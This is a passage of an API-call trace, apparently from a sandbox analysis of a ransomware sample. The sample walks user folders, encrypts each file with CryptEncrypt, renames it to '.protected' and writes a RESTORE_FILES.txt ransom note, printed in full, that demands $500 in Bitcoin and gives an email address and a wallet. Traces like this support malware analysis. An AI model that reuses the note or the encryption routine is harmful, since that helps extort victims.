halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk.protected")) returned 1 [0090.000] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.000] lstrcmpiW (lpString1="User Pinned", lpString2="Windows") returned -1 [0090.000] lstrcmpiW (lpString1="User Pinned", lpString2="Program Files") returned 1 [0090.000] lstrcmpiW (lpString1="User Pinned", lpString2="Program Files (x86)") returned 1 [0090.000] lstrcmpiW (lpString1="User Pinned", lpString2="$Recycle.bin") returned 1 [0090.000] lstrcmpiW (lpString1="User Pinned", lpString2="System Volume Information") returned 1 [0090.000] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned") returned 102 [0090.000] lstrcmpW (lpString1="User Pinned", lpString2=".") returned 1 [0090.000] lstrcmpW (lpString1="User Pinned", lpString2="..") returned 1 [0090.000] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*") returned 104 [0090.000] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0090.000] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.000] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.000] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.000] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.000] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.000] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\.") returned 104 [0090.000] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.000] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0090.000] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0090.000] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.000] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.001] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.001] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.001] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.001] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.001] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.001] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.001] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.001] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\..") returned 105 [0090.001] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.001] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.001] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0090.001] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0090.001] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.001] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.001] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.001] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.001] lstrcmpiW (lpString1="ImplicitAppShortcuts", lpString2="Windows") returned -1 [0090.001] lstrcmpiW (lpString1="ImplicitAppShortcuts", lpString2="Program Files") returned -1 [0090.001] lstrcmpiW (lpString1="ImplicitAppShortcuts", lpString2="Program Files (x86)") returned -1 [0090.001] lstrcmpiW (lpString1="ImplicitAppShortcuts", lpString2="$Recycle.bin") returned 1 [0090.001] lstrcmpiW (lpString1="ImplicitAppShortcuts", lpString2="System Volume Information") returned -1 [0090.001] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts") returned 123 [0090.001] lstrcmpW (lpString1="ImplicitAppShortcuts", lpString2=".") returned 1 [0090.001] lstrcmpW (lpString1="ImplicitAppShortcuts", lpString2="..") returned 1 [0090.002] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*") returned 125 [0090.002] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0090.002] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.002] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.002] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.002] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.002] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.002] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\.") returned 125 [0090.002] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.002] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0090.002] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.002] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.002] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.003] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.003] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.003] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\..") returned 126 [0090.003] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.003] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.003] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0090.003] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0090.003] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\RESTORE_FILES.txt") returned 141 [0090.003] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\implicitappshortcuts\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.004] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.004] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0090.005] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.005] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0090.005] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.005] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0090.005] CloseHandle (hObject=0x154) returned 1 [0090.005] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.005] lstrcmpiW (lpString1="TaskBar", lpString2="Windows") returned -1 [0090.005] lstrcmpiW (lpString1="TaskBar", lpString2="Program Files") returned 1 [0090.005] lstrcmpiW (lpString1="TaskBar", lpString2="Program Files (x86)") returned 1 [0090.005] lstrcmpiW (lpString1="TaskBar", lpString2="$Recycle.bin") returned 1 [0090.005] lstrcmpiW (lpString1="TaskBar", lpString2="System Volume Information") returned 1 [0090.005] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar") returned 110 [0090.005] lstrcmpW (lpString1="TaskBar", lpString2=".") returned 1 [0090.005] lstrcmpW (lpString1="TaskBar", lpString2="..") returned 1 [0090.005] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*") returned 112 [0090.005] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0090.005] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.005] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.006] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.006] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.006] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.006] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\.") returned 112 [0090.006] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.006] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0090.006] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0090.006] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0090.006] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0090.006] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.006] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0090.006] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.006] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.006] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.006] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.006] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.006] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\..") returned 113 [0090.006] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.006] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.006] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0090.006] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0090.006] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0090.006] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0090.006] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.006] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0090.006] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0090.006] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0090.007] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0090.007] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0090.007] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0090.007] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini") returned 122 [0090.007] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0090.007] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0090.007] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0090.007] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0090.007] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0090.007] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini") returned 122 [0090.007] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0090.007] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini") returned 122 [0090.007] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0090.008] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini") returned 122 [0090.008] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0090.008] ReadFile (in: hFile=0x158, lpBuffer=0x513c88, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesRead=0x295e2d4*=0x19c, lpOverlapped=0x0) returned 1 [0090.008] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffe64, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.008] WriteFile (in: hFile=0x158, lpBuffer=0x513c88*, nNumberOfBytesToWrite=0x19c, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesWritten=0x295e2d4*=0x19c, lpOverlapped=0x0) returned 1 [0090.009] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.009] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0090.009] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0090.009] CloseHandle (hObject=0x158) returned 1 [0090.009] wnsprintfW (in: pszDest=0x513c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini.protected") returned 132 [0090.009] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\desktop.ini.protected")) returned 1 [0090.010] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0090.011] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="Windows") returned -1 [0090.011] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="Program Files") returned -1 [0090.011] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="Program Files (x86)") returned -1 [0090.011] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="$Recycle.bin") returned 1 [0090.011] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="System Volume Information") returned -1 [0090.011] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Google Chrome.lnk") returned 128 [0090.011] StrStrIW (lpFirst="Google Chrome.lnk", lpSrch=".protected") returned 0x0 [0090.011] lstrcmpW (lpString1="Google Chrome.lnk", lpString2="RESTORE_FILES.txt") returned -1 [0090.011] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0090.011] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0090.011] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Google Chrome.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\google chrome.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0090.011] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Google Chrome.lnk") returned 128 [0090.012] StrStrW (lpFirst="Google Chrome.lnk", lpSrch=".txt") returned 0x0 [0090.012] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Google Chrome.lnk") returned 128 [0090.012] StrStrW (lpFirst="Google Chrome.lnk", lpSrch=".rar") returned 0x0 [0090.012] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Google Chrome.lnk") returned 128 [0090.012] StrStrW (lpFirst="Google Chrome.lnk", lpSrch=".zip") returned 0x0 [0090.012] ReadFile (in: hFile=0x158, lpBuffer=0x513c88, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesRead=0x295e2d4*=0x8dd, lpOverlapped=0x0) returned 1 [0090.012] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff723, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.012] WriteFile (in: hFile=0x158, lpBuffer=0x513c88*, nNumberOfBytesToWrite=0x8dd, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesWritten=0x295e2d4*=0x8dd, lpOverlapped=0x0) returned 1 [0090.013] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.013] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0090.013] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, 